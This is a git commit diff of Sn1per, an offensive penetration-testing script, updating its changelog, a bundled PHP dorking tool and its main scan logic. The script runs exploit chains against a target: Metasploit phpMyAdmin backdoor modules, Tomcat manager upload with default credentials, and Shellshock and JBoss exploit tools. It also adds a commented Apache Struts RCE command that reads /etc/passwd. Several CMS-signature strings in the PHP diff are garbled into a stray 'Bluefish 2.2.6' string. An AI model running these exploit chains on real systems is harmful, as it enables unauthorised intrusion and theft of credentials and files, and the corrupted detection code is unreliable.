mirror of https://github.com/1N3/Sn1per.git
Sn1per by 1N3 @CrowdShield
This commit is contained in:
parent
932ec1431b
commit
572367eacc
|
|
@ -48,6 +48,10 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc
|
|||
```
|
||||
|
||||
## CHANGELOG:
|
||||
* v1.7 - Improved web scan performance
|
||||
* v1.7 - Fixed issue with inurlbr output
|
||||
* v1.7 - Added remote desktop viewing for RDP connections
|
||||
* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
|
||||
* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
|
||||
* v1.6e - Improved SMB scan performance/optimization added
|
||||
* v1.6d - Improved NMap scan performance options
|
||||
|
|
|
|||
|
|
@ -525,7 +525,7 @@ function __update() {
|
|||
exit();
|
||||
} else {
|
||||
|
||||
echo system("command clear") . __bannerLogo();
|
||||
echo __bannerLogo();
|
||||
echo "{$_SESSION["c1"]}__[ x ] {$_SESSION["c16"]}FAILURE TO SERVER!\n{$_SESSION["c0"]}";
|
||||
}
|
||||
}
|
||||
|
|
@ -546,7 +546,7 @@ function not_isnull_empty($valor = NULL) {
|
|||
|
||||
function __menu() {
|
||||
|
||||
return system("command clear") . __getOut(__extra() . "
|
||||
return __getOut(__extra() . "
|
||||
{$_SESSION["c1"]}_ _ ______ _ _____
|
||||
| | | | ____| | | __ \
|
||||
| |__| | |__ | | | |__) |
|
||||
|
|
@ -994,7 +994,7 @@ function __menu() {
|
|||
|
||||
function __info() {
|
||||
|
||||
return system("command clear") . __getOut("
|
||||
return __getOut("
|
||||
{$_SESSION["c1"]}_____ _ _ ______ ____
|
||||
|_ _| \ | | ____/ __ \
|
||||
| | | \| | |__ | | | |
|
||||
|
|
@ -1137,7 +1137,7 @@ function __bannerLogo() {
|
|||
|
||||
$vis = ($_SESSION["os"] != 1) ? ("\033[1;3" . rand(1, 10) . "m") : NULL;
|
||||
|
||||
return (!is_null($_SESSION['config']['no-banner']) ? NULL : system("command clear") . "
|
||||
return (!is_null($_SESSION['config']['no-banner']) ? NULL : "
|
||||
{$vis} _____ {$_SESSION["c1"]} .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. {$_SESSION["c12"]}.1BR'''Yp, .8BR'''Cq.
|
||||
{$vis} (_____){$_SESSION["c1"]} 01 01N. C 01 C 01 .01. 01 {$_SESSION["c3"]} 01 Yb 01 .01.
|
||||
{$vis} (() ()){$_SESSION["c1"]} 01 C YCb C 01 C 01 ,C9 01 {$_SESSION["c12"]} 01 dP 01 ,C9
|
||||
|
|
@ -1290,30 +1290,26 @@ function __configExploitsADD($valor = NULL) {
|
|||
|
||||
function __SimpleCheckCMS($html) {
|
||||
|
||||
$cms['XOOPS CMS IDENTIFIED'] = '<meta name="generator" content="XOOPS"';
|
||||
$cms['Joomla CMS IDENTIFIED'] = '<meta name="generator" content="Joomla!';
|
||||
$cms['Wordpress CMS IDENTIFIED'] = '<meta name="generator" content="WordPress';
|
||||
$cms['XOOPS CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" ';
|
||||
$cms['Joomla CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" generator" content="WordPress';
|
||||
$cms['SMF CMS IDENTIFIED-1'] = '<a href="http://www.simplemachines.org/" title="Simple Machines Forum" target="_blank">Powered by SMF';
|
||||
$cms['SMF CMS IDENTIFIED-2'] = '<a href="http://www.simplemachines.org/about/copyright.php" title="Free Forum Software" target="_blank">SMF';
|
||||
$cms['vBulletin CMS IDENTIFIED-1'] = '<meta name="generator" content="vBulletin';
|
||||
$cms['vBulletin CMS IDENTIFIED-2'] = 'Powered by <a href="http://www.vbulletin.com" id="vbulletinlink">vBulletin™</a> Version';
|
||||
$cms['vBulletin CMS IDENTIFIED-1'] = '<meta name="generator" content="Bluefish 2.2.6" http://www.vbulletin.com" id="vbulletinlink">vBulletin™</a> Version';
|
||||
$cms['vBulletin CMS IDENTIFIED-3'] = 'powered by vBulletin';
|
||||
$cms['phpBB CMS IDENTIFIED'] = 'Powered by <a href="http://www.phpbb.com/">phpBB</a>';
|
||||
$cms['MyBB CMS IDENTIFIED'] = 'Powered By <a href="http://www.mybboard.net" target="_blank">MyBB</a>';
|
||||
$cms['Drupal CMS IDENTIFIED-1'] = 'name="Generator" content="Drupal';
|
||||
$cms['Drupal CMS IDENTIFIED-2'] = 'Drupal.settings';
|
||||
$cms['MODx CMS IDENTIFIED'] = '<a href="http://www.modx.com" target="_blank"> Powered by MODx</a>';
|
||||
$cms['SilverStripe CMS IDENTIFIED'] = '<meta name="generator" content="SilverStripe - http://silverstripe.org" />';
|
||||
$cms['SilverStripe CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" />';
|
||||
$cms['Textpattern CMS IDENTIFIED'] = 'Powered by <a href="http://www.textpattern.com" title="Textpattern">Textpattern</a>';
|
||||
$cms['Adapt CMS IDENTIFIED'] = 'Powered by <a href="http://www.adaptcms.com">AdaptCMS';
|
||||
$cms['ATutor CMS IDENTIFIED'] = '<a href="/about.php">About ATutor</a>';
|
||||
$cms['b2evolution CMS IDENTIFIED'] = '<meta name="generator" content="b2evolution';
|
||||
$cms['Moodle CMS IDENTIFIED-1'] = 'Powered by <a href="http://moodle.org" title="Moodle">Moodle</a>';
|
||||
$cms['b2evolution CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" http://moodle.org" title="Moodle">Moodle</a>';
|
||||
$cms['Moodle CMS IDENTIFIED-2 '] = '<meta name="key words" content="moodle, Course Management System " />';
|
||||
$cms['Moodle CMS IDENTIFIED-3'] = '://moodle';
|
||||
$cms['Moodle CMS IDENTIFIED-4'] = '://www.mood le';
|
||||
$cms['ATutor CMS IDENTIFIED'] = '<META NAME="GENERATOR" CONTENT="PHP-Nuke';
|
||||
$cms['PostNuke CMS IDENTIFIED'] = '<meta name="generator" content="PostNuke';
|
||||
$cms['ATutor CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" generator" content="PostNuke';
|
||||
$cms['CloudFlare IDENTIFIED-1'] = '<a href="http://www.cloudflare.com/" target="_blank" style=';
|
||||
$cms['CloudFlare IDENTIFIED-2'] = 'DDoS protection by CloudFlare</a>';
|
||||
|
||||
|
|
@ -1392,14 +1388,14 @@ function __OS() {
|
|||
$sistema = strtoupper(PHP_OS);
|
||||
if (substr($sistema, 0, 3) == "WIN") {
|
||||
$i = 0;
|
||||
system("cls");
|
||||
//system("cls");
|
||||
$_SESSION["os"] = 1;
|
||||
while ($i <= 17) {
|
||||
$_SESSION["c{$i}"] = NULL;
|
||||
$i++;
|
||||
}
|
||||
} else {
|
||||
system("command clear");
|
||||
//system("command clear");
|
||||
//DEFINING COLORS
|
||||
$_SESSION["c0"] = "\033[0m"; // END OF COLOR
|
||||
$_SESSION["c1"] = "\033[1;37m"; // WHITE
|
||||
|
|
|
|||
File diff suppressed because it is too large
Load Diff
50
sniper
50
sniper
|
|
@ -428,16 +428,8 @@ else
|
|||
echo ""
|
||||
whatweb http://$TARGET
|
||||
xsstracer $TARGET 80
|
||||
echo ""
|
||||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ];
|
||||
then
|
||||
goohak $TARGET > /dev/null
|
||||
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt >> $LOOT_DIR/inurlbr-$TARGET.txt
|
||||
rm -Rf output/ cookie.txt exploits.conf
|
||||
fi
|
||||
|
||||
nmap -sV -T5 -p 80 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,http-phpmyadmin-dir-traversal $TARGET
|
||||
echo ""
|
||||
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
|
||||
curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10
|
||||
echo ""
|
||||
|
|
@ -484,9 +476,6 @@ else
|
|||
curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
|
||||
curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
|
||||
echo ""
|
||||
echo -e "$OKBLUE+ -- --=[Checking for Rom-0 Router Vulnerabilities on $TARGET...$RESET $OKORANGE"
|
||||
curl -s --insecure http://$TARGET/rom-0 | grep 200 | tail -n 10
|
||||
echo ""
|
||||
echo -e "$RESET"
|
||||
|
||||
nikto -h http://$TARGET
|
||||
|
|
@ -494,6 +483,7 @@ else
|
|||
|
||||
if [ "$MODE" = "web" ]
|
||||
then
|
||||
nmap -v -sV -T5 -p 80 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,http-phpmyadmin-dir-traversal $TARGET
|
||||
dirb http://$TARGET
|
||||
wpscan --url http://$TARGET --batch
|
||||
wpscan --url http://$TARGET/wordpress/ --batch
|
||||
|
|
@ -504,6 +494,14 @@ else
|
|||
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80
|
||||
fi
|
||||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ];
|
||||
then
|
||||
goohak $TARGET > /dev/null
|
||||
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt
|
||||
rm -Rf output/ cookie.txt exploits.conf
|
||||
GHDB="1"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ -z "$port_110" ]
|
||||
|
|
@ -577,14 +575,6 @@ else
|
|||
cd MassBleed
|
||||
./massbleed $TARGET port 443
|
||||
cd ..
|
||||
nmap -sV -T5 -p 443 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,tls-nextprotoneg,ssl* $TARGET
|
||||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ];
|
||||
then
|
||||
goohak $TARGET > /dev/null
|
||||
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt >> $LOOT_DIR/inurlbr-$TARGET.txt
|
||||
rm -Rf output/ cookie.txt exploits.conf
|
||||
fi
|
||||
|
||||
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
|
||||
curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10
|
||||
|
|
@ -633,11 +623,13 @@ else
|
|||
curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
|
||||
echo ""
|
||||
echo -e "$RESET"
|
||||
|
||||
nikto -h https://$TARGET
|
||||
cutycapt --url=https://$TARGET --out=loot/$TARGET-port443.jpg
|
||||
|
||||
if [ "$MODE" = "web" ]
|
||||
then
|
||||
nmap -v -sV -T5 -p 443 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,tls-nextprotoneg,ssl* $TARGET
|
||||
dirb https://$TARGET
|
||||
wpscan --url https://$TARGET --batch
|
||||
wpscan --url https://$TARGET/wordpress/ --batch
|
||||
|
|
@ -648,6 +640,16 @@ else
|
|||
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl
|
||||
fi
|
||||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ]
|
||||
then
|
||||
if [ -z $GHDB ]
|
||||
then
|
||||
goohak $TARGET > /dev/null
|
||||
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt
|
||||
rm -Rf output/ cookie.txt exploits.conf
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ -z "$port_445" ]
|
||||
|
|
@ -732,6 +734,7 @@ then
|
|||
else
|
||||
echo -e "$OKGREEN+ -- --=[Port 3389 opened... running tests...$RESET"
|
||||
nmap -sV -T5 --script=rdp-* -p 3389 $TARGET
|
||||
rdesktop $TARGET &
|
||||
fi
|
||||
|
||||
if [ -z "$port_3632" ]
|
||||
|
|
@ -800,7 +803,6 @@ else
|
|||
cd ..
|
||||
nikto -h http://$TARGET:8000
|
||||
cutycapt --url=http://$TARGET:8000 --out=loot/$TARGET-port8000.jpg
|
||||
#arachni http://$TARGET:8000 --output-only-positives
|
||||
fi
|
||||
|
||||
if [ -z "$port_8100" ]
|
||||
|
|
@ -819,7 +821,6 @@ else
|
|||
cd ..
|
||||
nikto -h http://$TARGET:8100
|
||||
cutycapt --url=http://$TARGET:8100 --out=loot/$TARGET-port8100.jpg
|
||||
#arachni http://$TARGET:8100 --output-only-positives
|
||||
fi
|
||||
|
||||
if [ -z "$port_8080" ]
|
||||
|
|
@ -839,8 +840,9 @@ else
|
|||
nikto -h http://$TARGET:8080
|
||||
cutycapt --url=http://$TARGET:8080 --out=loot/$TARGET-port8080.jpg
|
||||
nmap -p 8080 -T5 --script=*proxy* $TARGET
|
||||
#arachni http://$TARGET:8080 --output-only-positives
|
||||
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
||||
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
|
||||
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
|
||||
python jexboss/jexboss.py http://$TARGET:8080
|
||||
python jexboss/jexboss.py https://$TARGET:8080
|
||||
fi
|
||||
|
|
@ -862,7 +864,6 @@ else
|
|||
nikto -h http://$TARGET:8180
|
||||
cutycapt --url=http://$TARGET:8180 --out=loot/$TARGET-port8180.jpg
|
||||
nmap -p 8180 -T5 --script=*proxy* $TARGET
|
||||
#arachni http://$TARGET:8180 --output-only-positives
|
||||
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
||||
fi
|
||||
|
||||
|
|
@ -883,7 +884,6 @@ else
|
|||
nikto -h https://$TARGET:8443
|
||||
cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg
|
||||
nmap -p 8443 -T5 --script=*proxy* $TARGET
|
||||
#arachni https://$TARGET:8443 --output-only-positives
|
||||
fi
|
||||
|
||||
if [ -z "$port_10000" ]
|
||||
|
|
|
|||
Loading…
Reference in New Issue